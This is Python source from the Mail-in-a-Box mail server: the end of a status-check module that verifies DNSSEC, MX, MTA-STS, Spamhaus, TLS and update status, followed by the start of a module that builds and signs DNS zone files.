digalg_name_map = { '1': 'SHA-1', '2': 'SHA-256', '4': 'SHA-384' } # Read in the pre-generated DS records expected_ds_records = { } ds_file = '/etc/nsd/zones/' + dns_zonefiles[domain] + '.ds' if not os.path.exists(ds_file): return # Domain is in our database but DNS has not yet been updated. with open(ds_file, encoding="utf-8") as f: for rr_ds in f: rr_ds = rr_ds.rstrip() ds_keytag, ds_alg, ds_digalg, ds_digest = rr_ds.split("\t")[4].split(" ") # Some registrars may want the public key so they can compute the digest. The DS # record that we suggest using is for the KSK (and that's how the DS records were generated). # We'll also give the nice name for the key algorithm. 
dnssec_keys = load_env_vars_from_file(os.path.join(env['STORAGE_ROOT'], 'dns/dnssec/%s.conf' % alg_name_map[ds_alg])) with open(os.path.join(env['STORAGE_ROOT'], 'dns/dnssec/' + dnssec_keys['KSK'] + '.key'), encoding="utf-8") as f: dnsssec_pubkey = f.read().split("\t")[3].split(" ")[3] expected_ds_records[ (ds_keytag, ds_alg, ds_digalg, ds_digest) ] = { "record": rr_ds, "keytag": ds_keytag, "alg": ds_alg, "alg_name": alg_name_map[ds_alg], "digalg": ds_digalg, "digalg_name": digalg_name_map[ds_digalg], "digest": ds_digest, "pubkey": dnsssec_pubkey, } # Query public DNS for the DS record at the registrar. ds = query_dns(domain, "DS", nxdomain=None, as_list=True) if ds is None or isinstance(ds, str): ds = [] # There may be more that one record, so we get the result as a list. # Filter out records that don't look valid, just in case, and split # each record on spaces. ds = [tuple(str(rr).split(" ")) for rr in ds if len(str(rr).split(" ")) == 4] if len(ds) == 0: output.print_warning("""This domain's DNSSEC DS record is not set. The DS record is optional. The DS record activates DNSSEC. See below for instructions.""") else: matched_ds = set(ds) & set(expected_ds_records) if matched_ds: # At least one DS record matches one that corresponds with one of the ways we signed # the zone, so it is valid. # # But it may not be preferred. Only algorithm 13 is preferred. Warn if any of the # matched zones uses a different algorithm. if {r[1] for r in matched_ds} == { '13' } and {r[2] for r in matched_ds} <= { '2', '4' }: # all are alg 13 and digest type 2 or 4 output.print_ok("DNSSEC 'DS' record is set correctly at registrar.") return elif len([r for r in matched_ds if r[1] == '13' and r[2] in { '2', '4' }]) > 0: # some but not all are alg 13 output.print_ok("DNSSEC 'DS' record is set correctly at registrar. (Records using algorithm other than ECDSAP256SHA256 and digest types other than SHA-256/384 should be removed.)") return else: # no record uses alg 13 output.print_warning("""DNSSEC 'DS' record set at registrar is valid but should be updated to ECDSAP256SHA256 and SHA-256 (see below). IMPORTANT: Do not delete existing DNSSEC 'DS' records for this domain until confirmation that the new DNSSEC 'DS' record for this domain is valid.""") else: if is_checking_primary: output.print_error("""The DNSSEC 'DS' record for %s is incorrect. See further details below.""" % domain) return output.print_error("""This domain's DNSSEC DS record is incorrect. The chain of trust is broken between the public DNS system and this machine's DNS server. It may take several hours for public DNS to update after a change. If you did not recently make a change, you must resolve this immediately (see below).""") output.print_line("""Follow the instructions provided by your domain name registrar to set a DS record. Registrars support different sorts of DS records. 
Use the first option that works:""") preferred_ds_order = [(7, 2), (8, 4), (13, 4), (8, 2), (13, 2)] # low to high, see https://github.com/mail-in-a-box/mailinabox/issues/1998 def preferred_ds_order_func(ds_suggestion): k = (int(ds_suggestion['alg']), int(ds_suggestion['digalg'])) if k in preferred_ds_order: return preferred_ds_order.index(k) return -1 # index before first item output.print_line("") for i, ds_suggestion in enumerate(sorted(expected_ds_records.values(), key=preferred_ds_order_func, reverse=True)): if preferred_ds_order_func(ds_suggestion) == -1: continue # don't offer record types that the RFC says we must not offer output.print_line("") output.print_line("Option " + str(i+1) + ":") output.print_line("----------") output.print_line("Key Tag: " + ds_suggestion['keytag']) output.print_line("Key Flags: KSK / 257") output.print_line("Algorithm: {} / {}".format(ds_suggestion['alg'], ds_suggestion['alg_name'])) output.print_line("Digest Type: {} / {}".format(ds_suggestion['digalg'], ds_suggestion['digalg_name'])) output.print_line("Digest: " + ds_suggestion['digest']) output.print_line("Public Key: ") output.print_line(ds_suggestion['pubkey'], monospace=True) output.print_line("") output.print_line("Bulk/Record Format:") output.print_line(ds_suggestion['record'], monospace=True) if len(ds) > 0: output.print_line("") output.print_line("The DS record is currently set to:") for rr in sorted(ds): output.print_line("Key Tag: {}, Algorithm: {}, Digest Type: {}, Digest: {}".format(*rr)) def check_mail_domain(domain, env, output): # Check the MX record. recommended_mx = "10 " + env['PRIMARY_HOSTNAME'] mx = query_dns(domain, "MX", nxdomain=None) if mx is None or mx == "[timeout]": mxhost = None else: # query_dns returns a semicolon-delimited list # of priority-host pairs. mxhost = mx.split('; ')[0].split(' ')[1] if mxhost is None: # A missing MX record is okay on the primary hostname because # the primary hostname's A record (the MX fallback) is... itself, # which is what we want the MX to be. if domain == env['PRIMARY_HOSTNAME']: output.print_ok(f"Domain's email is directed to this domain. [{domain} has no MX record, which is ok]") # And a missing MX record is okay on other domains if the A record # matches the A record of the PRIMARY_HOSTNAME. Actually this will # probably confuse DANE TLSA, but we'll let that slide for now. else: domain_a = query_dns(domain, "A", nxdomain=None) primary_a = query_dns(env['PRIMARY_HOSTNAME'], "A", nxdomain=None) if domain_a is not None and domain_a == primary_a: output.print_ok(f"Domain's email is directed to this domain. [{domain} has no MX record but its A record is OK]") else: output.print_error(f"""This domain's DNS MX record is not set. It should be '{recommended_mx}'. Mail will not be delivered to this box. It may take several hours for public DNS to update after a change. This problem may result from other issues listed here.""") elif mxhost == env['PRIMARY_HOSTNAME']: good_news = f"Domain's email is directed to this domain. [{domain} ↦ {mx}]" if mx != recommended_mx: good_news += f" This configuration is non-standard. The recommended configuration is '{recommended_mx}'." output.print_ok(good_news) # Check MTA-STS policy. 
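		# The resolver fetches the "_mta-sts.<domain>" TXT record and then the policy
		# document served at https://mta-sts.<domain>/.well-known/mta-sts.txt. For this
		# box the policy (see /var/lib/mailinabox/mta-sts.txt) is expected to look
		# roughly like:
		#
		#   version: STSv1
		#   mode: enforce
		#   mx: <PRIMARY_HOSTNAME>
		#   max_age: 604800        # illustrative value
		#
		# so below we require mode "enforce" and an mx list of exactly [PRIMARY_HOSTNAME].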
loop = asyncio.new_event_loop() sts_resolver = postfix_mta_sts_resolver.resolver.STSResolver(loop=loop) valid, policy = loop.run_until_complete(sts_resolver.resolve(domain)) if valid == postfix_mta_sts_resolver.resolver.STSFetchResult.VALID: if policy[1].get("mx") == [env['PRIMARY_HOSTNAME']] and policy[1].get("mode") == "enforce": # policy[0] is the policyid output.print_ok("MTA-STS policy is present.") else: output.print_error(f"MTA-STS policy is present but has unexpected settings. [{policy[1]}]") else: output.print_error(f"MTA-STS policy is missing: {valid}") else: output.print_error(f"""This domain's DNS MX record is incorrect. It is currently set to '{mx}' but should be '{recommended_mx}'. Mail will not be delivered to this box. It may take several hours for public DNS to update after a change. This problem may result from other issues listed here.""") # Check that the postmaster@ email address exists. Not required if the domain has a # catch-all address or domain alias. if "@" + domain not in [address for address, *_ in get_mail_aliases(env)]: check_alias_exists("Postmaster contact address", "postmaster@" + domain, env, output) # Stop if the domain is listed in the Spamhaus Domain Block List. # The user might have chosen a domain that was previously in use by a spammer # and will not be able to reliably send mail. # See https://www.spamhaus.org/news/article/807/using-our-public-mirrors-check-your-return-codes-now. for # information on spamhaus return codes dbl = query_dns(domain+'.dbl.spamhaus.org', "A", nxdomain=None) if dbl is None: output.print_ok("Domain is not blacklisted by dbl.spamhaus.org.") elif dbl == "[timeout]": output.print_warning(f"Connection to dbl.spamhaus.org timed out. Could not determine whether the domain {domain} is blacklisted. Please try again later.") elif dbl == "[Not Set]": output.print_warning(f"Could not connect to dbl.spamhaus.org. Could not determine whether the domain {domain} is blacklisted. Please try again later.") elif dbl == "127.255.255.252": output.print_warning("Incorrect spamhaus query: %s. Could not determine whether the domain %s is blacklisted." % (domain+'.dbl.spamhaus.org', domain)) elif dbl == "127.255.255.254": output.print_warning("Mail-in-a-Box is configured to use a public DNS server. This is not supported by spamhaus. Could not determine whether the domain {} is blacklisted.".format(domain)) elif dbl == "127.255.255.255": output.print_warning("Too many queries have been performed on the spamhaus server. Could not determine whether the domain {} is blacklisted.".format(domain)) else: output.print_error(f"""This domain is listed in the Spamhaus Domain Block List (code {dbl}), which may prevent recipients from receiving your mail. See http://www.spamhaus.org/dbl/ and http://www.spamhaus.org/query/domain/{domain}.""") def check_web_domain(domain, rounded_time, ssl_certificates, env, output): # See if the domain's A record resolves to our PUBLIC_IP. This is already checked # for PRIMARY_HOSTNAME, for which it is required for mail specifically. For it and # other domains, it is required to access its website. 
if domain != env['PRIMARY_HOSTNAME']: ok_values = [] for (rtype, expected) in (("A", env['PUBLIC_IP']), ("AAAA", env.get('PUBLIC_IPV6'))): if not expected: continue # IPv6 is not configured value = query_dns(domain, rtype) if value == normalize_ip(expected): ok_values.append(value) else: output.print_error(f"""This domain should resolve to this box's IP address ({rtype} {expected}) if you would like the box to serve webmail or a website on this domain. The domain currently resolves to {value} in public DNS. It may take several hours for public DNS to update after a change. This problem may result from other issues listed here.""") return # If both A and AAAA are correct... output.print_ok("Domain resolves to this box's IP address. [{} ↦ {}]".format(domain, '; '.join(ok_values))) # We need a TLS certificate for PRIMARY_HOSTNAME because that's where the # user will log in with IMAP or webmail. Any other domain we serve a # website for also needs a signed certificate. check_ssl_cert(domain, rounded_time, ssl_certificates, env, output) def query_dns(qname, rtype, nxdomain='[Not Set]', at=None, as_list=False): # Make the qname absolute by appending a period. Without this, dns.resolver.query # will fall back a failed lookup to a second query with this machine's hostname # appended. This has been causing some false-positive Spamhaus reports. The # reverse DNS lookup will pass a dns.name.Name instance which is already # absolute so we should not modify that. if isinstance(qname, str): qname += "." # Use the default nameservers (as defined by the system, which is our locally # running bind server), or if the 'at' argument is specified, use that host # as the nameserver. resolver = dns.resolver.get_default_resolver() # Make sure at is not a string that cannot be used as a nameserver if at and at not in {'[Not set]', '[timeout]'}: resolver = dns.resolver.Resolver() resolver.nameservers = [at] # Set a timeout so that a non-responsive server doesn't hold us back. resolver.timeout = 5 # The number of seconds to spend trying to get an answer to the question. If the # lifetime expires a dns.exception.Timeout exception will be raised. resolver.lifetime = 5 # Do the query. try: response = resolver.resolve(qname, rtype) except (dns.resolver.NoNameservers, dns.resolver.NXDOMAIN, dns.resolver.NoAnswer): # Host did not have an answer for this query; not sure what the # difference is between the two exceptions. return nxdomain except dns.exception.Timeout: return "[timeout]" # Normalize IP addresses. IP address --- especially IPv6 addresses --- can # be expressed in equivalent string forms. Canonicalize the form before # returning them. The caller should normalize any IP addresses the result # of this method is compared with. if rtype in {"A", "AAAA"}: response = [normalize_ip(str(r)) for r in response] if as_list: return response # There may be multiple answers; concatenate the response. Remove trailing # periods from responses since that's how qnames are encoded in DNS but is # confusing for us. The order of the answers doesn't matter, so sort so we # can compare to a well known order. return "; ".join(sorted(str(r).rstrip('.') for r in response)) def check_ssl_cert(domain, rounded_time, ssl_certificates, env, output): # Check that TLS certificate is signed. # Skip the check if the A record is not pointed here. if query_dns(domain, "A", None) not in {env['PUBLIC_IP'], None}: return # Where is the certificate file stored? 
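	# get_domain_ssl_files returns None when allow_missing_cert=True and no certificate
	# is installed for the domain; otherwise it returns a dict including at least the
	# paths used below, roughly:
	#
	#   { "certificate": "<STORAGE_ROOT>/ssl/....pem",
	#     "private-key": "<STORAGE_ROOT>/ssl/ssl_private_key.pem" }
	#
	# (Exact paths depend on how the certificate was provisioned.)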
tls_cert = get_domain_ssl_files(domain, ssl_certificates, env, allow_missing_cert=True) if tls_cert is None: output.print_warning("""No TLS (SSL) certificate is installed for this domain. Visitors to a website on this domain will get a security warning. If you are not serving a website on this domain, you do not need to take any action. Use the TLS Certificates page in the control panel to install a TLS certificate.""") return # Check that the certificate is good. cert_status, cert_status_details = check_certificate(domain, tls_cert["certificate"], tls_cert["private-key"], rounded_time=rounded_time) if cert_status == "OK": # The certificate is ok. The details has expiry info. output.print_ok("TLS (SSL) certificate is signed & valid. " + cert_status_details) elif cert_status == "SELF-SIGNED": # Offer instructions for purchasing a signed certificate. if domain == env['PRIMARY_HOSTNAME']: output.print_error("""The TLS (SSL) certificate for this domain is currently self-signed. You will get a security warning when you check or send email and when visiting this domain in a web browser (for webmail or static site hosting).""") else: output.print_error("""The TLS (SSL) certificate for this domain is self-signed.""") else: output.print_error("The TLS (SSL) certificate has a problem: " + cert_status) if cert_status_details: output.print_line("") output.print_line(cert_status_details) output.print_line("") _apt_updates = None def list_apt_updates(apt_update=True): # See if we have this information cached recently. # Keep the information for 8 hours. global _apt_updates if _apt_updates is not None and _apt_updates[0] > datetime.datetime.now() - datetime.timedelta(hours=8): return _apt_updates[1] # Run apt-get update to refresh package list. This should be running daily # anyway, so on the status checks page don't do this because it is slow. if apt_update: shell("check_call", ["/usr/bin/apt-get", "-qq", "update"]) # Run apt-get upgrade in simulate mode to get a list of what # it would do. simulated_install = shell("check_output", ["/usr/bin/apt-get", "-qq", "-s", "upgrade"]) pkgs = [] for line in simulated_install.split('\n'): if line.strip() == "": continue if re.match(r'^Conf .*', line): # remove these lines, not informative continue m = re.match(r'^Inst (.*) \[(.*)\] \((\S*)', line) if m: pkgs.append({ "package": m.group(1), "version": m.group(3), "current_version": m.group(2) }) else: pkgs.append({ "package": "[" + line + "]", "version": "", "current_version": "" }) # Cache for future requests. _apt_updates = (datetime.datetime.now(), pkgs) return pkgs def what_version_is_this(env): # This function runs `git describe --always --abbrev=0` on the Mail-in-a-Box installation directory. # Git may not be installed and Mail-in-a-Box may not have been cloned from github, # so this function may raise all sorts of exceptions. miab_dir = os.path.dirname(os.path.dirname(os.path.abspath(__file__))) return shell("check_output", ["/usr/bin/git", "describe", "--always", "--abbrev=0"], env={"GIT_DIR": os.path.join(miab_dir, '.git')}).strip() def get_latest_miab_version(): # This pings https://mailinabox.email/setup.sh and extracts the tag named in # the script to determine the current product version. 
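	# setup.sh is expected to contain a line of the form (value illustrative):
	#
	#   TAG=v57a
	#
	# The regex below captures whatever follows "TAG=" on that line and returns it
	# decoded as a string; a network failure or timeout yields None instead.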
from urllib.request import urlopen, HTTPError, URLError try: return re.search(b'TAG=(.*)', urlopen("https://mailinabox.email/setup.sh?ping=1", timeout=5).read()).group(1).decode("utf8") except (TimeoutError, HTTPError, URLError): return None def check_miab_version(env, output): config = load_settings(env) try: this_ver = what_version_is_this(env) except: this_ver = "Unknown" if config.get("privacy", True): output.print_warning("You are running version Mail-in-a-Box %s. Mail-in-a-Box version check disabled by privacy setting." % this_ver) else: latest_ver = get_latest_miab_version() if this_ver == latest_ver: output.print_ok("Mail-in-a-Box is up to date. You are running version %s." % this_ver) elif latest_ver is None: output.print_error("Latest Mail-in-a-Box version could not be determined. You are running version %s." % this_ver) else: output.print_error(f"A new version of Mail-in-a-Box is available. You are running version {this_ver}. The latest version is {latest_ver}. For upgrade instructions, see https://mailinabox.email. ") def run_and_output_changes(env, pool): import json from difflib import SequenceMatcher out = ConsoleOutput() # Run status checks. cur = BufferedOutput() run_checks(True, env, cur, pool) # Load previously saved status checks. cache_fn = "/var/cache/mailinabox/status_checks.json" if os.path.exists(cache_fn): with open(cache_fn, encoding="utf-8") as f: try: prev = json.load(f) except json.JSONDecodeError: prev = [] # Group the serial output into categories by the headings. def group_by_heading(lines): from collections import OrderedDict ret = OrderedDict() k = [] ret["No Category"] = k for line_type, line_args, line_kwargs in lines: if line_type == "add_heading": k = [] ret[line_args[0]] = k else: k.append((line_type, line_args, line_kwargs)) return ret prev_status = group_by_heading(prev) cur_status = group_by_heading(cur.buf) # Compare the previous to the current status checks # category by category. for category, cur_lines in cur_status.items(): if category not in prev_status: out.add_heading(category + " -- Added") BufferedOutput(with_lines=cur_lines).playback(out) else: # Actual comparison starts here... prev_lines = prev_status[category] def stringify(lines): return [json.dumps(line) for line in lines] diff = SequenceMatcher(None, stringify(prev_lines), stringify(cur_lines)).get_opcodes() for op, i1, i2, j1, j2 in diff: if op == "replace": out.add_heading(category + " -- Previously:") elif op == "delete": out.add_heading(category + " -- Removed") if op in {"replace", "delete"}: BufferedOutput(with_lines=prev_lines[i1:i2]).playback(out) if op == "replace": out.add_heading(category + " -- Currently:") elif op == "insert": out.add_heading(category + " -- Added") if op in {"replace", "insert"}: BufferedOutput(with_lines=cur_lines[j1:j2]).playback(out) for category, prev_lines in prev_status.items(): if category not in cur_status: out.add_heading(category) out.print_warning("This section was removed.") # Store the current status checks output for next time. os.makedirs(os.path.dirname(cache_fn), exist_ok=True) with open(cache_fn, "w", encoding="utf-8") as f: json.dump(cur.buf, f, indent=True) def normalize_ip(ip): # Use ipaddress module to normalize the IPv6 notation and # ensure we are matching IPv6 addresses written in different # representations according to rfc5952. 
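	# For example (illustrative, using the RFC 3849 documentation prefix):
	#
	#   >>> normalize_ip("2001:0db8:0000:0000:0000:0000:0000:0001")
	#   '2001:db8::1'
	#   >>> normalize_ip("not an ip")   # invalid input is returned unchanged
	#   'not an ip'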
import ipaddress try: return str(ipaddress.ip_address(ip)) except: return ip class FileOutput: def __init__(self, buf, width): self.buf = buf self.width = width def add_heading(self, heading): print(file=self.buf) print(heading, file=self.buf) print("=" * len(heading), file=self.buf) def print_ok(self, message): self.print_block(message, first_line="✓ ") def print_error(self, message): self.print_block(message, first_line="✖ ") def print_warning(self, message): self.print_block(message, first_line="? ") def print_block(self, message, first_line=" "): print(first_line, end='', file=self.buf) message = re.sub("\n\\s*", " ", message) words = re.split(r"(\s+)", message) linelen = 0 for w in words: if self.width and (linelen + len(w) > self.width-1-len(first_line)): print(file=self.buf) print(" ", end="", file=self.buf) linelen = 0 if linelen == 0 and w.strip() == "": continue print(w, end="", file=self.buf) linelen += len(w) print(file=self.buf) def print_line(self, message, monospace=False): for line in message.split("\n"): self.print_block(line) class ConsoleOutput(FileOutput): def __init__(self): self.buf = sys.stdout # Do nice line-wrapping according to the size of the terminal. # The 'stty' program queries standard input for terminal information. if sys.stdin.isatty(): try: self.width = int(shell('check_output', ['stty', 'size']).split()[1]) except: self.width = 76 else: # However if standard input is not a terminal, we would get # "stty: standard input: Inappropriate ioctl for device". So # we test with sys.stdin.isatty first, and if it is not a # terminal don't do any line wrapping. When this script is # run from cron, or if stdin has been redirected, this happens. self.width = None class BufferedOutput: # Record all of the instance method calls so we can play them back later. def __init__(self, with_lines=None): self.buf = with_lines if with_lines else [] def __getattr__(self, attr): if attr not in {"add_heading", "print_ok", "print_error", "print_warning", "print_block", "print_line"}: raise AttributeError # Return a function that just records the call & arguments to our buffer. def w(*args, **kwargs): self.buf.append((attr, args, kwargs)) return w def playback(self, output): for attr, args, kwargs in self.buf: getattr(output, attr)(*args, **kwargs) if __name__ == "__main__": from utils import load_environment env = load_environment() if len(sys.argv) == 1: with multiprocessing.pool.Pool(processes=10) as pool: run_checks(False, env, ConsoleOutput(), pool) elif sys.argv[1] == "--show-changes": with multiprocessing.pool.Pool(processes=10) as pool: run_and_output_changes(env, pool) elif sys.argv[1] == "--check-primary-hostname": # See if the primary hostname appears resolvable and has a signed certificate. 
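		# The exit status is the only output of this mode: 0 when the primary hostname
		# resolves to PUBLIC_IP and its certificate checks out, 1 otherwise. Roughly:
		#
		#   $ management/status_checks.py --check-primary-hostname; echo $?
		#   0
		#
		# (Path shown is illustrative; run it however this script is normally invoked.)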
domain = env['PRIMARY_HOSTNAME'] if query_dns(domain, "A") != env['PUBLIC_IP']: sys.exit(1) ssl_certificates = get_ssl_certificates(env) tls_cert = get_domain_ssl_files(domain, ssl_certificates, env) if not os.path.exists(tls_cert["certificate"]): sys.exit(1) cert_status, cert_status_details = check_certificate(domain, tls_cert["certificate"], tls_cert["private-key"], warn_if_expiring_soon=False) if cert_status != "OK": sys.exit(1) sys.exit(0) elif sys.argv[1] == "--version": print(what_version_is_this(env)) elif sys.argv[1] == "--only": with multiprocessing.pool.Pool(processes=10) as pool: run_checks(False, env, ConsoleOutput(), pool, domains_to_check=sys.argv[2:]) File: management/dns_update.py #!/usr/local/lib/mailinabox/env/bin/python # Creates DNS zone files for all of the domains of all of the mail users # and mail aliases and restarts nsd. ######################################################################## import sys, os, os.path, datetime, re, hashlib, base64 import ipaddress import rtyaml import dns.resolver from utils import shell, load_env_vars_from_file, safe_domain_name, sort_domains, get_ssh_port from ssl_certificates import get_ssl_certificates, check_certificate import contextlib # From https://stackoverflow.com/questions/3026957/how-to-validate-a-domain-name-using-regex-php/16491074#16491074 # This regular expression matches domain names according to RFCs, it also accepts fqdn with an leading dot, # underscores, as well as asterisks which are allowed in domain names but not hostnames (i.e. allowed in # DNS but not in URLs), which are common in certain record types like for DKIM. DOMAIN_RE = r"^(?!\-)(?:[*][.])?(?:[a-zA-Z\d\-_]{0,62}[a-zA-Z\d_]\.){1,126}(?!\d+)[a-zA-Z\d_]{1,63}(\.?)$" def get_dns_domains(env): # Add all domain names in use by email users and mail aliases, any # domains we serve web for (except www redirects because that would # lead to infinite recursion here) and ensure PRIMARY_HOSTNAME is in the list. from mailconfig import get_mail_domains from web_update import get_web_domains domains = set() domains |= set(get_mail_domains(env)) domains |= set(get_web_domains(env, include_www_redirects=False)) domains.add(env['PRIMARY_HOSTNAME']) return domains def get_dns_zones(env): # What domains should we create DNS zones for? Never create a zone for # a domain & a subdomain of that domain. domains = get_dns_domains(env) # Exclude domains that are subdomains of other domains we know. Proceed # by looking at shorter domains first. zone_domains = set() for domain in sorted(domains, key=len): for d in zone_domains: if domain.endswith("." + d): # We found a parent domain already in the list. break else: # 'break' did not occur: there is no parent domain. zone_domains.add(domain) # Make a nice and safe filename for each domain. zonefiles = [[domain, safe_domain_name(domain) + ".txt"] for domain in zone_domains] # Sort the list so that the order is nice and so that nsd.conf has a # stable order so we don't rewrite the file & restart the service # meaninglessly. zone_order = sort_domains([ zone[0] for zone in zonefiles ], env) zonefiles.sort(key = lambda zone : zone_order.index(zone[0]) ) return zonefiles def do_dns_update(env, force=False): # Write zone files. os.makedirs('/etc/nsd/zones', exist_ok=True) zonefiles = [] updated_domains = [] for (domain, zonefile, records) in build_zones(env): # The final set of files will be signed. 
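		# write_nsd_zone writes the unsigned zone to /etc/nsd/zones/<zonefile> and
		# sign_zone (below) produces the ".signed" variant next to it, which is the
		# name handed to write_nsd_conf further down. For example (names illustrative):
		#
		#   example.com.txt  ->  example.com.txt.signed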
zonefiles.append((domain, zonefile + ".signed")) # See if the zone has changed, and if so update the serial number # and write the zone file. if not write_nsd_zone(domain, "/etc/nsd/zones/" + zonefile, records, env, force): # Zone was not updated. There were no changes. continue # Mark that we just updated this domain. updated_domains.append(domain) # Sign the zone. # # Every time we sign the zone we get a new result, which means # we can't sign a zone without bumping the zone's serial number. # Thus we only sign a zone if write_nsd_zone returned True # indicating the zone changed, and thus it got a new serial number. # write_nsd_zone is smart enough to check if a zone's signature # is nearing expiration and if so it'll bump the serial number # and return True so we get a chance to re-sign it. sign_zone(domain, zonefile, env) # Write the main nsd.conf file. if write_nsd_conf(zonefiles, list(get_custom_dns_config(env)), env): # Make sure updated_domains contains *something* if we wrote an updated # nsd.conf so that we know to restart nsd. if len(updated_domains) == 0: updated_domains.append("DNS configuration") # Tell nsd to reload changed zone files. if len(updated_domains) > 0: # 'reconfig' is needed if there are added or removed zones, but # it may not reload existing zones, so we call 'reload' too. If # nsd isn't running, nsd-control fails, so in that case revert # to restarting nsd to make sure it is running. Restarting nsd # should also refresh everything. try: shell('check_call', ["/usr/sbin/nsd-control", "reconfig"]) shell('check_call', ["/usr/sbin/nsd-control", "reload"]) except: shell('check_call', ["/usr/sbin/service", "nsd", "restart"]) # Write the OpenDKIM configuration tables for all of the mail domains. from mailconfig import get_mail_domains if write_opendkim_tables(get_mail_domains(env), env): # Settings changed. Kick opendkim. shell('check_call', ["/usr/sbin/service", "opendkim", "restart"]) if len(updated_domains) == 0: # If this is the only thing that changed? updated_domains.append("OpenDKIM configuration") # Clear bind9's DNS cache so our own DNS resolver is up to date. # (ignore errors with trap=True) shell('check_call', ["/usr/sbin/rndc", "flush"], trap=True) if len(updated_domains) == 0: # if nothing was updated (except maybe OpenDKIM's files), don't show any output return "" else: return "updated DNS: " + ",".join(updated_domains) + "\n" ######################################################################## def build_zones(env): # What domains (and their zone filenames) should we build? domains = get_dns_domains(env) zonefiles = get_dns_zones(env) # Create a dictionary of domains to a set of attributes for each # domain, such as whether there are mail users at the domain. from mailconfig import get_mail_domains from web_update import get_web_domains mail_domains = set(get_mail_domains(env)) mail_user_domains = set(get_mail_domains(env, users_only=True)) # i.e. will log in for mail, Nextcloud web_domains = set(get_web_domains(env)) auto_domains = web_domains - set(get_web_domains(env, include_auto=False)) domains |= auto_domains # www redirects not included in the initial list, see above # Add ns1/ns2+PRIMARY_HOSTNAME which must also have A/AAAA records # when the box is acting as authoritative DNS server for its domains. for ns in ("ns1", "ns2"): d = ns + "." 
+ env["PRIMARY_HOSTNAME"] domains.add(d) auto_domains.add(d) domains = { domain: { "user": domain in mail_user_domains, "mail": domain in mail_domains, "web": domain in web_domains, "auto": domain in auto_domains, } for domain in domains } # For MTA-STS, we'll need to check if the PRIMARY_HOSTNAME certificate is # singned and valid. Check that now rather than repeatedly for each domain. domains[env["PRIMARY_HOSTNAME"]]["certificate-is-valid"] = is_domain_cert_signed_and_valid(env["PRIMARY_HOSTNAME"], env) # Load custom records to add to zones. additional_records = list(get_custom_dns_config(env)) # Build DNS records for each zone. for domain, zonefile in zonefiles: # Build the records to put in the zone. records = build_zone(domain, domains, additional_records, env) yield (domain, zonefile, records) def build_zone(domain, domain_properties, additional_records, env, is_zone=True): records = [] # For top-level zones, define the authoritative name servers. # # Normally we are our own nameservers. Some TLDs require two distinct IP addresses, # so we allow the user to override the second nameserver definition so that # secondary DNS can be set up elsewhere. # # 'False' in the tuple indicates these records would not be used if the zone # is managed outside of the box. if is_zone: # Obligatory NS record to ns1.PRIMARY_HOSTNAME. records.append((None, "NS", "ns1.%s." % env["PRIMARY_HOSTNAME"], False)) # NS record to ns2.PRIMARY_HOSTNAME or whatever the user overrides. # User may provide one or more additional nameservers secondary_ns_list = get_secondary_dns(additional_records, mode="NS") \ or ["ns2." + env["PRIMARY_HOSTNAME"]] records.extend((None, "NS", secondary_ns+'.', False) for secondary_ns in secondary_ns_list) # In PRIMARY_HOSTNAME... if domain == env["PRIMARY_HOSTNAME"]: # Set the A/AAAA records. Do this early for the PRIMARY_HOSTNAME so that the user cannot override them # and we can provide different explanatory text. records.append((None, "A", env["PUBLIC_IP"], "Required. Sets the IP address of the box.")) if env.get("PUBLIC_IPV6"): records.append((None, "AAAA", env["PUBLIC_IPV6"], "Required. Sets the IPv6 address of the box.")) # Add a DANE TLSA record for SMTP. records.append(("_25._tcp", "TLSA", build_tlsa_record(env), "Recommended when DNSSEC is enabled. Advertises to mail servers connecting to the box that mandatory encryption should be used.")) # Add a DANE TLSA record for HTTPS, which some browser extensions might make use of. records.append(("_443._tcp", "TLSA", build_tlsa_record(env), "Optional. When DNSSEC is enabled, provides out-of-band HTTPS certificate validation for a few web clients that support it.")) # Add a SSHFP records to help SSH key validation. One per available SSH key on this system. records.extend((None, "SSHFP", value, "Optional. Provides an out-of-band method for verifying an SSH key before connecting. Use 'VerifyHostKeyDNS yes' (or 'VerifyHostKeyDNS ask') when connecting with ssh.") for value in build_sshfp_records()) # Add DNS records for any subdomains of this domain. We should not have a zone for # both a domain and one of its subdomains. if is_zone: # don't recurse when we're just loading data for a subdomain subdomains = [d for d in domain_properties if d.endswith("." + domain)] for subdomain in subdomains: subdomain_qname = subdomain[0:-len("." 
+ domain)] subzone = build_zone(subdomain, domain_properties, additional_records, env, is_zone=False) for child_qname, child_rtype, child_value, child_explanation in subzone: if child_qname is None: child_qname = subdomain_qname else: child_qname += "." + subdomain_qname records.append((child_qname, child_rtype, child_value, child_explanation)) has_rec_base = list(records) # clone current state def has_rec(qname, rtype, prefix=None): return any(rec[0] == qname and rec[1] == rtype and (prefix is None or rec[2].startswith(prefix)) for rec in has_rec_base) # The user may set other records that don't conflict with our settings. # Don't put any TXT records above this line, or it'll prevent any custom TXT records. for qname, rtype, value in filter_custom_records(domain, additional_records): # Don't allow custom records for record types that override anything above. # But allow multiple custom records for the same rtype --- see how has_rec_base is used. if has_rec(qname, rtype): continue # The "local" keyword on A/AAAA records are short-hand for our own IP. # This also flags for web configuration that the user wants a website here. if rtype == "A" and value == "local": value = env["PUBLIC_IP"] if rtype == "AAAA" and value == "local": if "PUBLIC_IPV6" in env: value = env["PUBLIC_IPV6"] else: continue records.append((qname, rtype, value, "(Set by user.)")) # Add A/AAAA defaults if not overridden by the user's custom settings (and not otherwise configured). # Any CNAME or A record on the qname overrides A and AAAA. But when we set the default A record, # we should not cause the default AAAA record to be skipped because it thinks a custom A record # was set. So set has_rec_base to a clone of the current set of DNS settings, and don't update # during this process. has_rec_base = list(records) a_expl = "Required. May have a different value. Sets the IP address that %s resolves to for web hosting and other services besides mail. The A record must be present but its value does not affect mail delivery." % domain if domain_properties[domain]["auto"]: if domain.startswith(("ns1.", "ns2.")): a_expl = False # omit from 'External DNS' page since this only applies if box is its own DNS server if domain.startswith("www."): a_expl = "Optional. Sets the IP address that %s resolves to so that the box can provide a redirect to the parent domain." % domain if domain.startswith("mta-sts."): a_expl = "Optional. MTA-STS Policy Host serving /.well-known/mta-sts.txt." if domain.startswith("autoconfig."): a_expl = "Provides email configuration autodiscovery support for Thunderbird Autoconfig." if domain.startswith("autodiscover."): a_expl = "Provides email configuration autodiscovery support for Z-Push ActiveSync Autodiscover." defaults = [ (None, "A", env["PUBLIC_IP"], a_expl), (None, "AAAA", env.get('PUBLIC_IPV6'), "Optional. Sets the IPv6 address that %s resolves to, e.g. for web hosting. 
